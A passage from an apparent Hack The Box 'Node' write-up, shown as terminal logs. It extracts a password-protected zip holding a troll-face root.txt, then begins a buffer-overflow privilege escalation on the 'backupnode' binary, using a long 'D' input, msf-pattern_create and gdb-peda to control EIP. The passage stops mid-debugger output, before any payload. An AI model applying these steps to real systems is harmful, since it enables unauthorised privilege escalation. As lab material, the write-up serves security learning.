u505@kali:~/HTB/Machines/Node$ cat output.b64 UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
u505@kali:~/HTB/Machines/Node$ cat output.b64 | base64 -d > output u505@kali:~/HTB/Machines/Node$ file output output: Zip archive data, at least v?[0x333] to extract
u505@kali:~/HTB/Machines/Node$ mv output output.zip
u505@kali:~/HTB/Machines/Node$ unzip output.zip Archive: output.zip skipping: root.txt need PK compat. v5.1 (can do v4.6)
u505@kali:~/HTB/Machines/Node$ 7z e output.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz (506E3),ASM,AES-NI)
Scanning the drive for archives: 1 file, 1141 bytes (2 KiB)
Extracting archive: output.zip -- Path = output.zip Type = zip Physical Size = 1141
Enter password (will not be echoed): magicword Everything is Ok
Size: 2584 Compressed: 1141
But the file root.txt is a troll face.
u505@kali:~/HTB/Machines/Node$ cat root.txt QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
Privilege escalation
Buffer overflow
If the folder name is a thousand D, we have a buffer overflow.
u505@kali:~/HTB/Machines/Node$ ./backupnode -a 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python -c "print 'D'*1000"`
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Segmentation fault u505@kali:~/HTB/Machines/Node$ sudo tail -n 2 /var/log/syslog May 20 17:50:29 kali kernel: [101469.038428] backupnode[8790]: segfault at 44444444 ip 0000000044444444 sp 00000000fff77c70 error 14 in libc-2.30.so[f7d3c000+1d000] May 20 17:50:29 kali kernel: [101469.038434] Code: Bad RIP value.
The EIP register has the value 44444444 witch corresponds to DDDD.
Offset determination
The offset determination with embedded peda pattern creator includes not allowed characters.
gdb-peda$ pattern create 1000 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'
Metasploit pattern generator doesn't use bad characters.
u505@kali:~/HTB/Machines/Node$ /usr/bin/msf-pattern_create -l 1000 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B u505@kali:~/HTB/Machines/Node$ gdb backupnode GNU gdb (Debian 9.1-3) 9.1 Copyright (C) 2020 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>.
For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from backupnode... (No debugging symbols found in backupnode) (gdb) init-peda gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[+] Validated access token [+] Starting archiving Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x40b EBX: 0xffec7ce0 --> 0x4 ECX: 0x0 EDX: 0x804938b --> 0x712d00 () ESI: 0xf7f7e000 --> 0x1dfd6c EDI: 0xffec7c2f --> 0x796500 () EBP: 0x72413971 ('q9Ar') ESP: 0xffec6c00 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...) EIP: 0x31724130 ('0Ar1') EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x31724130 [------------------------------------stack-------------------------------------] 0000| 0xffec6c00 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...) 0004| 0xffec6c04 ("r3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"...) 0008| 0xffec6c08 ("4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0A"...) 0012| 0xffec6c0c ("Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay"...) 0016| 0xffec6c10 ("r7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3"...) 0020| 0xffec6c14 ("8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4A"...) 0024| 0xffec6c18 ("As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay"...) 0028| 0xffec6c1c 